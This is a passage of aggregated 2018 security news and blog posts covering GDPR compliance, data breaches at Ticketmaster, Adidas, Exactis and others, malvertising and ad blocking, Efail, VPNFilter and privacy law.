During my last customer visit on the trip, a CISO expressed confidence that her organization would be able to legally respond to GDPR demands. But she’s now setting up the technology teams with members from the privacy and security teams to assess and validate vulnerabilities without exposing the personally identifiable data that is deployed across multiple geographies and data center environments, both on-premises and in the cloud.

As you continue on your GDPR journey, don’t forget the importance of collaboration in making compliance happen — across teams, with business partners and even with your customers — so that you can best support the positive aims of GDPR today and in the future.

Sign Up for a 30-Day Free Trial of IBM Security Guardium Analyzer

DISCLAIMER: Clients are responsible for ensuring their own compliance with various laws and regulations, including the European Union General Data Protection Regulation. Clients are solely responsible for obtaining advice of competent legal counsel as to the identification and interpretation of any relevant laws and regulations that may affect the clients’ business and any actions the clients may need to take to comply with such laws and regulations. The products, services, and other capabilities described herein are not suitable for all client situations and may have restricted availability. IBM does not provide legal, accounting or auditing advice or represent or warrant that its services or products will ensure that clients are in compliance with any law or regulation.

Learn more about IBM’s own GDPR readiness journey and our GDPR capabilities and offerings to support your compliance journey here.

The post The GDPR Evolution: A Letter to the CISO appeared first on Security Intelligence.

Security newsround: July 2018

We round up reporting and research from across the web about the latest security news and developments. This month: stress test for infosec leaders, cybercrime by the numbers, financial fine for enabling cyber fraud, third party risk leads to Ticketmaster breach, Privacy Shield in jeopardy, and a win for Wi-Fi as security improves.

Under pressure: stress levels rise for security professionals

Tense, nervous headache? You might be working in information security. A global survey of 1,600 infosec leaders has found that the role is under more stress than ever. Rising malware threats, a shortage of skilled people, and budget constraints are producing a perfect storm of pressure on professionals. The findings come from Trustwave’s 2018 Security Pressures Report. It found that the trend of increasing stress has been edging steadily upwards since its first report five years ago.

Some 54 per cent of respondents experienced more pressure to secure their organisation in 2017 compared to the previous year. More than half (55 per cent) also expect 2018 to bring more pressure than 2017 did. Dark Reading quoted Chris Schueler of Trustwave saying the pressure to perform will push security leaders to improve performance or burn out. SecurityIntelligence led with the angle that the biggest obligation facing security professionals is preventing malware. Help Net Security has a thorough summary of the findings.

There was some good news: fewer professionals reported feeling pressure to buy the latest security tech compared to past years. The full report is available to download here.

CEO fraud scam hits companies hard

CEO fraud, AKA business email compromise, was the internet crime most commonly reported to the FBI during 2017. Victims lost a combined amount of more than $676 million last year, up almost 88 per cent compared to 2016. Total cybercrime-related losses totalled $1.42 billion last year. The data comes from the FBI’s 2017 Internet Crime Report, which it compiles from public complaints to the agency. (No vendor surveys or hype here.)

The next most prominent scams were ransomware, tech support fraud, and extortion, the FBI said. Corporate data breaches rose slightly in number year on year (3,785 in 2017, up from 3,403 in 2016) but the financial hit decreased noticeably ($60.9 million in 2017 vs $95.9 million in 2016). There were broadly similar numbers of fake tech support scams between 2017 and 2016, but criminals almost doubled their money. The trends in the report could help security professionals to evaluate potential risks to their own organisation and staff.

Asset manager’s lax oversight opens door to fraud and a fine

Interesting reading for security and risk professionals in the Central Bank of Ireland’s highly detailed account of a cyber fraud. Governance failings at Appian Asset Management led to it losing €650,000 in client funds to online fraud. Although Appian subsequently replaced the funds in the client’s account, the regulator fined the firm €443,000. A CBI investigation uncovered “significant regulatory breaches and failures” at the firm, which exposed it to the fraud. It’s the first time the Irish regulator has imposed such a sanction for cyber fraud.

The fraud took place over a two-month period, starting in April 2015. The CBI said a fraudster hacked the real client’s webmail account to impersonate them during email correspondence with an Appian employee. The fraudster also used a spoofing technique to mimic that employee’s email address. The criminal intercepted messages from the genuine client and sent replies from the fake employee email to hide traces of the scam.

The press release runs to more than 3,200 words, and also goes into great detail about the gaps in policy and risk management at Appian.

Tales from the script: third-party app flaw leads to Ticketmaster data breach

As growing numbers of websites rely on third-party scripts, it’s vital to check they don’t put sites’ security at risk. That’s one of the lessons from the data breach at Ticketmaster UK. The company discovered malicious code running on its website that was introduced via a customer chat feature. This exposed sensitive data, including payment details, of around 40,000 customers. Anyone who bought a ticket on its site between September 2017 and June 2018 could be at risk, Ticketmaster warned.

On discovering the breach, Ticketmaster disabled the code across all its sites. The company contacted all affected customers, recommending they change their passwords. It published a clearly worded statement to answer consumer questions, and offered free 12-month identity monitoring.

Although this first seemed like good crisis management and proactive breach notification, the story didn’t end there. Inbenta Technologies, which developed the chat feature, weighed in with a statement shifting some blame back towards Ticketmaster. The vulnerability came from a single piece of custom JavaScript code Inbenta had written for Ticketmaster. “Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customised script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability,” Inbenta CEO Jordi Torras said.

Then Monzo, a UK bank, blogged in detail about the steps it took to protect its customers from the fallout. This included the bombshell that Ticketmaster knew about the breach in April, although the news only went public in June. Wired said these developments showed the need to thoroughly investigate potential breaches, and to remember subcontractors when assessing security risks.

Privacy Shield threat puts EU-US data sharing in doubt

US authorities have two months to start complying with Privacy Shield or else MEPs have threatened to suspend it. The EU-US data sharing framework replaced the Safe Harbor framework two years ago. Privacy Shield was supposed to extend the same rights for protecting EU citizens’ data as they have in Europe. In light of the Facebook-Cambridge Analytica scandal (both of which were certified under Privacy Shield), it seems that’s no longer the case.

MEPs consider privacy and data protection as “fundamental rights … that cannot be ‘balanced’ against commercial or political interests”. They voted 303 to 223 in favour of suspending the Privacy Shield agreement unless the US complies with it.

This could have implications for any organisation that uses a cloud service provider in the US. If they are using Privacy Shield as an adequacy decision for that agreement, they may no longer be GDPR-compliant after 1 September. Expect more developments on this over the coming months.

Welcome boost for Wi-Fi security

The Wi-Fi Alliance’s new WPA3 standard promises enhanced security for business and personal wireless networks. It will use a key establishment protocol called Simultaneous Authentication of Equals (SAE) which should prevent offline dictionary-based password cracking attempts. Announcing the standard, the Wi-Fi Alliance said the enterprise version offers “the equivalent of 192-bit cryptographic strength, providing additional protections for networks transmitting sensitive data, such as government or finance”. Hardware manufacturers including Cisco, Aruba, Broadcom and Aerohive all backed the standard.

Tripwire said WPA3 looks set to improve security for open networks, such as guest or customer networks in coffee shops, airports and hotels. The standard should also prevent passive nearby attackers from being able to monitor communication in the air. The Register said security experts have welcomed the upgrade. It quoted Professor Alan Woodward, a computer scientist at the University of Surrey in England. The new form of authentication, combined with extra strength from longer keys, is “a significant step forward”, he said.


The post Security newsround: July 2018 appeared first on BH Consulting.

Timehop admits attacker stole 21 million users’ data

Timehop, a popular app that reminds you of your social media posts from the same day in past years, is the latest service to suffer a data breach. The attacker struck on July 4th, and grabbed a database which included names and/or usernames along with email addresses for around 21 million users. About 4.7 million of those accounts had phone numbers linked to them, which some people use to log in with instead of a Facebook account.

Via: The Register

Source: Timehop

Everybody and their mother is blocking ads, so why aren’t you?

This post may ruffle a few feathers. But we’re not here to offer advice to publishers on how to best generate revenue for their brand. Rather, we’re here to offer the best advice on how to maintain a safe and secure environment.

If you’re not blocking advertisements on your PC and mobile device, you should be! And if you know someone who isn’t blocking ads, then forward this post to them. Because in this two-part series, we’re going to dispel some of the myths surrounding ad blocking, and we’ll cover the reasons you should be blocking ads on your network and devices.

We’ll then follow-up in Part 2 of this series by discussing common tools and configurations to help get the most of your browsing experience.

You’ve heard the talk and seen the messages in online banners. You’re aware of the disputes and the provocation from publishers and advertisers that ad blocking is a morally unconscionable act whose users deserve outright banishment from the web. Maybe you’ve been swayed by the pleas from website owners and have empathy towards the fragile budgetary constraints of your favorite sites. Or maybe you don’t understand the risks associated with online tracking and advertising and think that if you don’t click ads you’ll be fine.

Don’t be fooled. Ad blocking provides a vital security layer that not only severs a potential vector for online malvertising attacks, but also blocks privacy-invading tracking plugins from collecting and harvesting your personal information. Not only that, but blocking online ads and trackers has the added benefit of conserving bandwidth and battery life, boosting website response times, and generally improving the overall user experience. So using an ad blocker not only protects your device, but also provides better a better overall user experience. What’s not to love?

It’s all a bunch of hullabaloo!

Advertisers, publishers, and website owners despise talk of blocking the pesky advertisements that appear on their webpages—especially the ads that more aggressively vie for attention (and thus pay the website owners’ bills). We’ve all seen them. We’re talking about the ads that auto-play commercials or news clips as soon as the page is loaded. Bright, flashy popups, and page overlays that have to be clicked before seeing the desired content. Even the sponsored results that appear in search listings.  They are everywhere!

Hundreds of billions of ad impressions occur each month, and digital ad revenue for online advertising is estimated to top $237 billion in 2018. With so many impressions to be served, it’s no wonder that website operators are clearing space and making way for advertisers to clutter the website landscape.

Search listing shown inside Google

And we get that ad impressions are the lifeblood of many website operators and publishers who rely on clicks as the primary mechanism to create revenue. Some may even argue that ‘clicks create jobs’.

But let’s face it. In most cases, ads suck! Advertisers like to push the notion of “acceptable ads,” “non-intrusive advertising,” and “reasonable number of impressions,” but this is rhetoric designed to sway the opinion of an impressionable society—and it’s all a bunch of poppycock if you ask me.

Most people don’t like advertisements. They never have. That’s why VCRs became popular back in the `80’s. The devices allowed users to set up recordings and then skip commercials at their convenience later. It’s why DVRs became mainstream years ago, and why people flock to streaming services like Netflix now. It’s even the reason why people skip the first few minutes of a movie.

Ads diminish the overall user experience by forcing the attention of the consumer elsewhere, and creating a delay or nuisance in the ability to ingest the preferred content. A website’s “sponsored” listings often consume much more of the page landscape than actual content, which causes more time to be spent searching for desired items. This can lead to consumers paying more than would have been paid with a non-sponsored competitor. And then there are the ads that are purposefully obnoxious or play reoccurring sounds in a small box in the corner of the window. These are all just terrible to endure.

If it were a matter of simply not enjoying the content, then this point would be debatable. But, online advertisements pose a threat and provide an infection vector for malicious actors to launch targeted malware attacks. This can turn even the most reputable websites into potential delivery systems for malware authors.

Malware can be delivered inside that ad

Advertisements allow for fun little flashy ads that can play games and ask quizzes, but at the same time this functionality poses great risk to consumers.

Malvertising has the ability to affect even the most careful of users due to the nature of how advertisements are designed to automatically run code when they are loaded. Attackers may (and do) attach craftily hidden exploit code to otherwise innocuous looking ads for well-known products and then submit these ads for publication to known and reputable websites.

Don’t be fooled by this Best Buy ad. It’s not real!

While many of the large ad networks perform due diligence and scan for such malicious content prior to publication, there are dozens, if not hundreds of ad networks to which a criminal can submit their malicious code. And not all of those companies possess the same standards as their multi-billion dollar counterparts. Taking into account the speed and nature of the real-time bidding process for online ads (a fascinating process that deserves a post unto its own) it’s not surprising that bad ads can get past even the most well-intentioned ad networks.

$5.00 and 10 minutes is all it takes with this ad network.

Consider for a moment this blog post released by Google earlier this year, which sheds some light on the number of malicious ads that were blocked through the ad ecosystem. In the post, Google stipulates that 3.2 billion ads were removed in 2017 for violating advertising policies. That translates to 100 advertisements for every single second, of every day, for the entire year! Of these ads, 79 million were pushing malware-laden websites. And that’s in addition to the more than 320,000 publishers that were blacklisted, and over 1 million websites and apps that were removed or blocked.

That’s a lot of bad ads!

Setting aside Google’s ability to block malicious content as it appears on their network, some may contend that with so much bad stuff out there, some things are bound to slip through the cracks every once in a while.

And, lest we forget, there are a plethora of other website, news, and advertising companies without the means or desire to police the content. Malicious actors can launch highly-targeted campaigns, which may only be visible to no more than a small handful of people, and which can often fly under the radar of security mechanisms and systems. Who out there wants to be the guinea pig and offer up their computer to the attackers when such lapses occur?

Don’t track me, bro

We’re all familiar with the Cambridge Analytica scandal involving the collection of approximately 87 million Facebook records. The highly-publicized event has led to insolvency proceedings against the company (though Cambridge Analytica may have been recently resurrected under the name Data Propria). People were outraged in part because the company had covertly collected and stored information on large swaths of the population without their consent. But what those same people may not understand is that Cambridge Analytica is not alone in this practice.

There are numerous organizations ranging from small one and two person operations, all the way up to mega-million dollar corporations that are involved in the process of collecting and selling consumer data. Data brokers, data warehouses, and data exchange platforms all provide tools and services to not only collect information, but also sort and organize the information in a manner that allows advertisers to target specific groups of users.

Online data broker offering “data that is only seconds old”

Few of these organizations have the express consent from users to harvest and store their information, and many lack even the most basic of security protocols to protect and maintain the information after it’s collected.

Consider the recent database exposure surrounding data broker, Exactis.  The company has recently been accused of having a poorly=secured server, which compromised nearly 340 million individual records containing everything from addresses, telephone numbers, and email addresses, to more than 400 different data points for habits, interests, and hobbies. All sorts of other personal details are tracked, harvested, and stored in these databases; everything from age all the way down to a person’s clothing size and shopping history. Do you smoke, drink, or enjoy gambling? That’s in there, too.

Exactis has over 3.5 billion records, with information on most of us

And who exactly is Exactis? The company claims to be a leading compiler and aggregator of business and consumer data. The information collected by the company is used for customer profiling and to assist marketers in identifying descriptive traits and customer segments to help better understand behavior. This information can then be used to direct targeted advertising to specific groups.

The company website claims to possess 3.5 billion records on 218 million individuals and 110 million households. When asked where the information originated, Night Lion Security founder Vinny Troia was quoted as saying, “It seems like this is a database with pretty much every US citizen in it. I don’t know where the data is coming from, but it’s one of the most comprehensive collections I’ve ever seen.”

While we may not know for certain, it’s probably a safe assumption that at least some of those records are obtained through the use of online trackers, and services that run silently in the background, tracking and logging your behavior each time you browse online.

Why do we continue to tolerate this sort of illicit data collection? Don’t be like Steve Huffman, the Reddit CEO who allowed himself to be targeted by a Facebook advertisement for the purpose of an employment solicitation.  Instead, use an ad blocker, which not only blocks the targeted trackers that are compromising your personal information and divulging your secrets to the highest bidder, but will also prevent the targeted ad from being shown, thus, reducing your exposure to infection and solicitation.

No, it’s not morally unconscionable to use an ad blocker

Despite the notices, pleas from website owners, and the position from advertisers and publishers that ad-blocking will destroy the internet as we know it, there are no laws against using an ad blocker to prevent objectionable content from appearing on any device that you own or use.

In a long-followed case that transcended all the way to the German Supreme Court, European publisher Axel Springer was defeated in a years-long battle against Adblock Plus publisher Eyeo, after failing to persuade the court that the ad blocker violated competition law and was engaging in legally-dubious business policies. (Their business model allowed for unblocking ads deemed as “acceptable,” as well as those who paid for such distinction.)

The court ruling puts an end to Springer’s quest of having ad blocking deemed illegal. The ruling also vindicates users continued use of blocking software to prevent unwanted or objectionable content from being shown.

Americans are likely to have equally strong, if not stronger, ad blocking protections than our German friends.

When searching through dockets and filings provided by, Eyeo, the parent company of AdBlock Plus, shows not a single case which the company has been required to defend due to its practice of blocking advertisements. And really, it’s almost a bit of a stretch to envision an American jury being persuaded by the argument of advertisers having the right to display content, but consumers not possessing the right to block said content when they don’t approve.

Therefore, with no laws preventing the use of an ad blocker, and with the counter argument simply reduced to the corporate mantra of “maximizing profits,” consumers are free to choose the security policy that best fits their needs.

Convinced yet?

We’ve seen that ads not only diminish the user experience of ingesting content, but that they also pose a substantial risk to consumers.

The potential for malvertising to successfully deploy a nasty payload to your machine, which may compromise your system and jeopardize your financial security, is real. Worse yet, these types of attacks don’t even require user interaction and can execute merely by visiting the page.

And if the threat of financial ruin is of no concern, then the privacy-invading act of data harvesting should be.

The array of data collectors and data brokers out there is mind boggling, and they are all struggling to associate your actions and behaviors to groups and other individuals for no other purpose than to create targeted ads and increase profits. The information collected by these organizations may be poorly secured and is a potential gold mine for any cybercriminal.

And if the moral conviction of blocking the advertisements of your favorite websites has thus-far prevented the adoption of ad-blocking technology, then the knowledge of an ever-growing advertising ecosystem and the lack of laws preventing ad-blocking mechanisms should ease those concerns. Yes, we all want to generate revenue for our brand, but personally I’d rather not help do that at the sake of potential identity theft, or worse, having my PC compromised by a malware attack originating from a rogue advertisement on a popular website.

Coming up 

In Part 2 of this series, we’re going to have a look at some of the common ad-blocking utilities and how to configure those tools to fit the needs of the individual user. We’ll show how to navigate user-friendly settings that are simple enough to use on Grandma’s computer. We’ll also take a deep dive into some more advanced configurations and tools that may require a shift in user mind-set, usage, and understanding before fully realizing the benefits such configurations provide.

We’ll cover blocking ads on both mobile and PC devices, as well as configuring a network solution to block ads throughout your entire environment.

So stay tuned to the Malwarebytes blog, or follow this post and we’ll update it with links once available.

The post Everybody and their mother is blocking ads, so why aren’t you? appeared first on Malwarebytes Labs.

Smashing Security #085: Doctor Who, Facebook patents, and Bob’s Burgers

Smashing Security #085: Doctor Who, Facebook patents, and Bob's Burgers

Doctor Who’s TARDIS has sprung a data leak, Facebook’s creepy patents are unmasked, and an app to keep women safe on dates has surprising origins.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

California Passes New Privacy Law

The California legislature unanimously passed the strongest data privacy law in the nation. This is great news, but I have a lot of reservations. The Internet tech companies pressed to get this law passed out of self-defense. A ballot initiative was already going to be voted on in November, one with even stronger data privacy protections. The author of that initiative agreed to pull it if the legislature passed something similar, and that's why it did. This law doesn't take effect until 2020, and that gives the legislature a lot of time to amend the law before it actually protects anyone's privacy. And a conventional law is much easier to amend than a ballot initiative. Just as the California legislature gutted its net neutrality law in committee at the behest of the telcos, I expect it to do the same with this law at the behest of the Internet giants.

So: tentative hooray, I guess.

Major data breaches at Adidas, Ticketmaster pummel web users

There’s been a number of data breaches and accidental data exposures coming to light in the last few days, and no matter where in the world you happen to be located, you’ll want to do some due diligence and see if you’ve been affected. These aren’t small fishes being preyed upon by black hats; we’re talking Adidas, Ticketmaster, and Exactis, the last one being a particularly big issue, despite being a company you may not have even heard of up until now. Shall we take a look?

This breach isn’t very sporting

Adidas, famous sporting equipment creator, revealed a breach in a somewhat short public statement late on Thursday evening. They stated:

According to the preliminary investigation, the limited data includes contact information, usernames and encrypted passwords. Adidas has no reason to believe that any credit card or fitness information of those consumers was impacted.

While there’s no information on exact numbers at this stage beyond references to “a few million,” they do mention that the only customers affected so far are thought to be those who made a purchase via

Something of note: They claim to have first noticed the breach on June 26, and have made a public notification two days later. In a realm where huge data breaches can be revealed many months or in some cases years after an attack has taken place, this is impressive (though also now required by GDPR).

It’s important to recognise, however, that at this point, we don’t know if the breach itself took place on June 26 or if Adidas became aware of it on that date, because it sounds as though someone noticed a third party trying to sell the stolen data. All the same, this is a rapid turnaround and helpful for anyone wishing to keep an eye on transactions after having used the above Adidas portal.

The golden ticket

The UK didn’t escape from the blast of breaches rumbling on beneath the surface, as the massive ticket sales/distribution company Ticketmaster fell foul of payment data shenanigans. A code library used to power a third party customer support agent is claimed to have been sending payment data to an unknown third party whenever a customer bought tickets. According to the statement provided by the support agent tool creators, a single unauthorised line of Javascript was all it took to cause the problem.

That single line of code, implemented on the payment page, has resulted in up to 40,000 people having their data swiped. If you made a payment somewhere around February to June this year, or anything from September 2017 to this week if you’re an international customer, you could be at risk. Where this story becomes particularly problematic is that digital bank Monzo claims they tried to warn Ticketmaster about the problem back in April of this year, but their warnings went unheeded. Now they’re faced with a so-called perfect storm of bad comms and a significantly harsher round of press-related spotlights.

Fixing a leak

This last incident is less about payment information and more about personal information. It’s also more accurately described as a potential accidental exposure of information, which others may have accessed without permission. Exactis, a marketing firm with a “universal data warehouse” storing 3.5 billion consumer, business, and digital records, have found themselves at the heart of the controversy due to researcher Vinny Troia finding a large slice of data on a publicly-accessible server.

The data are made up of some 340 million records, weighing in at about 2 terabytes. The records contained incredibly detailed information on American consumers, including home addresses, phone numbers, emails, and other “personal characteristics,” including habits, children’s ages, and more. At time of writing, no payment or social security information has been found—so that’s one small silver lining.

However, anyone caught up in the exposed data could find themselves at increased risk of phishing or social engineering attacks if criminals were able to dig into it before the researcher sounded the alarm. It also means bad actors could potentially use detailed information to impersonate the person on file and use that to social engineer someone else.

What can I do?

Unfortunately, there’s only so much you can do in front of your computer where a breach is concerned, because unlike the device in front of you, it’s almost entirely out of your hands. When data is exposed, or someone grabs a pile of payment information, much of what happens next is down to the company responsible for safe keeping. Are payment records encrypted? Are passwords recorded in plain text? Is your entire personal history sitting on a server somewhere, ready to be grabbed by a crew of black hats or a curious observer?

A touch alarming, perhaps, but that’s the reality of doing business online, whether you’re looking to buy something, register somewhere, or simply hand over marketing information while browsing the web. If you’re caught in a breach or a leak, then perform due diligence and cancel your cards, heighten your awareness for phishing/social engineering scams, and take advantage of the typically free credit monitoring services offered post incident. If you follow those directions, you’re doing everything you can to keep things under control on your end.

The important thing to remember is not to panic, and don’t feel too bad should you believe your information to be compromised. We’re probably all going to end up in that position at some point, so you’re in good company.

The post Major data breaches at Adidas, Ticketmaster pummel web users appeared first on Malwarebytes Labs.

The Safety of Your Data On Social Media

Trend Micro recently asked a simple question on Twitter, “Are you worried about the safety of your data when using social media?”

Are you worried about the safety of your data when using social media?

More than 33,000 responses later and the answer is a toss up. The discussions in response to our tweet didn’t provide a clear answer either. This is despite months of high profile Facebook scandals and years of massive data breach headlines.

So what’s going on?

The Question

Posing a poll question is tricky. The question needs to be approachable enough to generate a lot of answers. It also needs to be a simple multiple choice, with only a few words per answer.

This will almost always result in a straightforward poll.

Not so this time. The answers are almost evenly divided across the three possible responses. Digging deeper, one of the challenges is how respondents chose to define the “safety” of their data.

As a security professional, I use one definition, but in my experience most people have their own idea when it comes to the “safety” of their data.

For some, it’s being in control of who can access that data. For others, safety is whether or not the data will be available when they want to access it. Others still think about whether or not they can get their data back out of the network once it has been shared.

The formal name for these concepts in information security is the CIA triad—I know, I know, I didn’t name it—confidentiality, integrity, and availability.

Whether you know it or not, for any definition of “safe,” you need all these of these attributes. Let’s look at each in turn.


If everything you posted on Facebook was public, how often would you share?

Confidentiality is the most important attribute for the safety of your data on social networks. Not having control of who can access your data makes social networks significantly less valuable.

How you control the confidentiality of your data depends on the network.

On Facebook, you can change each post to be visible by only you, your friends, or the public. Other finer grain options for each post exist as well if you know how to find them. Similarly “Groups” allow you to share with a different audience.

On LinkedIn, you get similar options as Facebook. Twitter is much simpler. Your tweets are either public, protected (you approved who can see them), or you send a 1:1 direct message.

WhatsApp allows for 1:1 messaging or groups. Instagram defaults to public sharing but also allows direct messages.

Each of these systems help you control who can see your data. They allow you to control the confidentiality of your data.

The more control you have and know how to use, the safer you will feel about your data.


Integrity is less of an issue with the major social networks. It’s understandable that once you’ve posted something, you expect the same information to be shown when appropriate.

But integrity issues do pop up in unexpected ways.

This happens most commonly when you post a video or photo and the network attempts to help you by automatically applying a filter, adjusting the levels, or possibly making edits on your behalf.

When your data changes without your permission or awareness, it could lead to unintended consequences.


Availability comes into play in two primary ways. It’s rare for social networks to have downtime or errors. This means that your data is almost always available when you want to view or share it.

The larger question of whether you can get your data back in its original format is much trickier. It’s a rare case that the social networks will let you export your complete information. It usually runs counter to their business model.

However, some networks do offer the ability to export said data from your account. This helps increase its availability to you.

Where Should You Focus?

The poll lacks context, which is the most likely reason why we saw the answers split almost evenly among the three choices.

While the availability and integrity of your data is important, in the context of your social media usage confidentialityshould be top of mind.

Most social networks provide a set of privacy controls that allow you to control who on the network can see your data.

Due to the nature of social media, these controls can change regularly. You should make a habit of checking the available options every so often to ensure that your data is safe.

Care About How You Share

Social media can be a fantastic way to engage with various communities, stay in touch with family & friends, and to expand your perspective. Unfortunately, there are down sides as well.

We’ve posted before about fake news, the privacy impact of networks selling data, and other issues related to social media usage.

Despite these challenges, there is still more upsides than down. The key to being a responsible social media user is to understand the control you have over your data.

Regardless of how you define “safe,” it’s important to be aware of the network you’re sharing on, how to use the control settings on that network, and have a clear understanding of what information you’re comfortable sharing.

What social media networks do you use most often? Do you feel you understand their privacy settings? Let us know down below or on social media (we’re @TrendMicro on most networks).

The post The Safety of Your Data On Social Media appeared first on .

Hitherto unknown marketing firm exposed hundreds of millions of Americans’ data

Hitherto unknown marketing firm exposed hundreds of millions of Americans' data

The detailed personal information of 230 million consumers and 110 million business contacts – including phone numbers, addresses, dates of birth, estimated income, number of children, age and gender of children - has been left exposed for anyone on the internet to grab.

Read more in my article on the Tripwire State of Security blog.

Smashing Security #084: No! My voice is not my password

Smashing Security #084: No! My voice is not my password

Who’s been collecting the voice prints of millions of people saying “My voice is my password”? Why has it become tougher for law enforcement to scoop up cellphone data? And who’s been turning up your central heating?

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes from AMTSO.


The decision in Carpenter v. United States is an unusually positive one for privacy. The Supreme Court ruled that the government generally can’t access historical cell-site location records without a warrant. (SCOTUS Blog links to court documents. The court put limits on the “third party” doctrine, and it will be fascinating to see how those limits play out.

A few interesting links:

As I said previously, I am thankful to the fine folks at the Knight First Amendment Institute at Columbia University for the opportunity to help with their technologists amicus brief in this case, and I’m glad to see that the third party doctrine is under stress. That doctrine has weakened the clear aims of the fourth amendment in protecting our daily lives against warrantless searches as our lives have involved storing more of our “papers” outside our homes.

Image via the mobile pc guys, who have advice about how to check your location history on Google, which is one of many places where it may be being captured. That advice might still be useful — it’s hard to tell if the UI has changed, since I had turned off those features.

UK privacy watchdog slaps Yahoo with another fine over 2014 hack

Yahoo still isn't done facing the consequences for its handling of a massive 2014 data breach. The UK's Information Commissioner's Office has slapped Yahoo UK Services Ltd with a £250,000 (about $334,300) fine under the country's Data Protection Act. The ICO determined that Yahoo didn't take "appropriate" steps to protect the data of 515,121 UK users against hacks, including meeting protection standards and monitoring the credentials of staff with access to the information.

Source: ICO

Security newsround: June 2018

We round up reporting and research from across the web about the latest security news and developments. This month: help at hand for GDPR laggards, try and efail, biometrics blues, and calls for a router reboot as VPNFilter strikes.

Good data protection resources (see what we did there?)

Despite a very well flagged two-year countdown towards GDPR, the eleventh-hour scramble suggests many organisations were still unprepared. And let’s not forget that May 25 wasn’t a deadline but the start of an ongoing compliance process. Fortunately, there are some excellent resources to help, and we’ve rounded them up here.

This blog from Ireland’s deputy data protection commissioner debunks the widely – and wrongly – held theory of a bedding-in period before enforcement. The post also clarifies how organisations can mitigate the potential consequences of non-compliance with GDPR. Meanwhile the Irish Data Protection Bill passed a vote in the Dail in time for the regulation. You can read the bill in full, if that’s your thing, by clicking here.

In the UK, the Information Commissioner’s Office has produced in-depth guidance on consent for processing information. Specifically, when to apply consent and when to look for alternatives. (Plug: our COO Valerie Lyons wrote a fine blog on the very same subject here.) Together with the National Cyber Security Centre, the ICO also developed guidance to describe a set of technical security outcomes that are considered to represent appropriate measures under the GDPR.

The European Data Protection Board (EDPB), formerly known as the Article 29 Working Party, was quickly into action after 25 May. It published guidelines (PDF) on certification mechanisms under the regulation. This establishes the rules by which certification can take place, as proof of compliance with GDPR.

Finally, for an interesting US perspective on the regulation, here’s AlienVault CISO John McLeod. “Every company should prepare for “Right to be Forgotten” requests, which could present operational and compliance issues,” he said.

Do the hack-a

World Rugby suffered a data breach which saw attackers obtain personal details for thousands of subscribers. The data included the first name, email address and encrypted passwords of thousands of users, including players, coaches and parents worldwide. The Sunday Telegraph broke the story, with an interesting take on the news. The breach may have been a random incident but it’s also possible it was a targeted attack. Potential culprits might be one of the groups that previously leaked information from sporting bodies like WADA and the IAAF. Rugby’s governing body discovered the incident in early May, and took down the affected website to conduct more examinations. World Rugby is based in Dublin, and as a result it informed the Data Protection Commissioner about the breach. How would you handle a breach on that scale? Read our 10 steps to better post-breach incident response.

Efail: an email encryption problem or a vulnerability disclosure problem?

A group of researchers in Germany recently published details of critical flaws in PGP/GPG and S/MIME email encryption. They warned that the vulnerabilities could decrypt previously encrypted emails, including sensitive messages sent in the past. Conforming to the security industry’s love of a catchy name (see also: Heartbleed, Shellshock), the researchers dubbed the flaw Efail.

It was the cue for urgent warnings from among others, to stop using email encryption tools. As the researchers put it: “EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” The full technical research paper is here, while there’s a website with a Q&A here.

As the story moved on, it emerged that the problem lay more with how some email clients rendered messages. Motherboard’s snarky but well-informed take quoted Johns Hopkins University cryptography professor Matthew Green. He described the exploit as “an extremely cool attack and kind of a masterpiece in exploiting bad crypto, combined with a whole lot of sloppiness on the part of mail client developers.” ProtonMail, the world’s largest secure email service, was scathing about the news. After performing a deep analysis, it said its own client was not vulnerable, nor was the PGP protocol broken.

So what are the big lessons from this story? Distraction is a risk in security. Some security professionals may have rushed to react to Efail even if they didn’t need to. Curtis Franklin’s summary for Dark Reading observed that many enterprise IT teams have either moved away from PGP and S/MIME, or never used them. Noting the criticism of how the researchers published the vulnerabilities, Brian Honan wrote that ENISA, the European Union Agency for Network and Information Security, published excellent good practice for vulnerability disclosure.

Biometrics blues as police recognition tech loses face

There was bad news for fans of dystopian sci-fi as police facial recognition systems for nabbing bad guys proved unreliable. Big Brother Watch claimed the Metropolitan Police’s automated facial recognition technology misidentified innocent people as wanted criminals more than nine times out of 10. The civil liberties group Big Brother Watch presented a report to the UK parliament about the technology’s shortcomings. Among its findings was the high false positive rate. Police forces have supported facial biometrics as a tool to help them combat crime. Privacy advocates described the technology’s use as “dangerously authoritarian”. As noted on our blog, this isn’t the first time a UK organisation has tried to introduce biometrics.

Router reboot alert

Malware called VPNFilter has infected 500,000 routers worldwide, and the net seems to be widening. Cisco Talos Intelligence researchers first revealed the malware, which hijacked devices in more than 54 countries but primarily in Ukraine. “The VPNFilter malware is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations,” the researchers said. VPNFilter can snoop on traffic, steal website credentials, monitor Modbus SCADA protocols, and has the capacity to damage or brick infected devices.

Sophos has a useful plain English summary of VPNFilter and what it can do. The malware affected products from a wide range of manufacturers, including Linksys, Netgear, Mikrotik, Q-Nap and TP-Link. In a later update, Talos said some products from Asus, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE were also at risk. As the malware’s payload became apparent, the FBI advised router owners to reboot their devices. This story shows that it’s always worth checking your organisation’s current risk with a security assessment.


The post Security newsround: June 2018 appeared first on BH Consulting.

MyHeritage admits 92 million user email addresses were leaked

MyHeritage is the latest company to suffer a security breach after a researcher found a file containing email addresses and hashed passwords for more than 92 million users. The researcher alerted MyHeritage to the breach Monday. The data includes account details for users who signed up to the genealogy and DNA testing service by October 26th last year.

Via: Motherboard

Source: MyHeritage

Ticketfly hacker stole more than 26 million email and home addresses

A hacker has leaked personal information for more than 26 million Ticketfly users after last week's data breach. That's according to Troy Hunt, the founder of Have I Been Pwned, which lets you check whether your email address has been included in various data breaches.

Source: Motherboard

Application Development GDPR Compliance Guidance

Last week IBM developerWorks released a three-part guidance series I have written to help 
Application Developers develop GDPR compliant applications.

Developing GDPR Compliant Applications Guidance

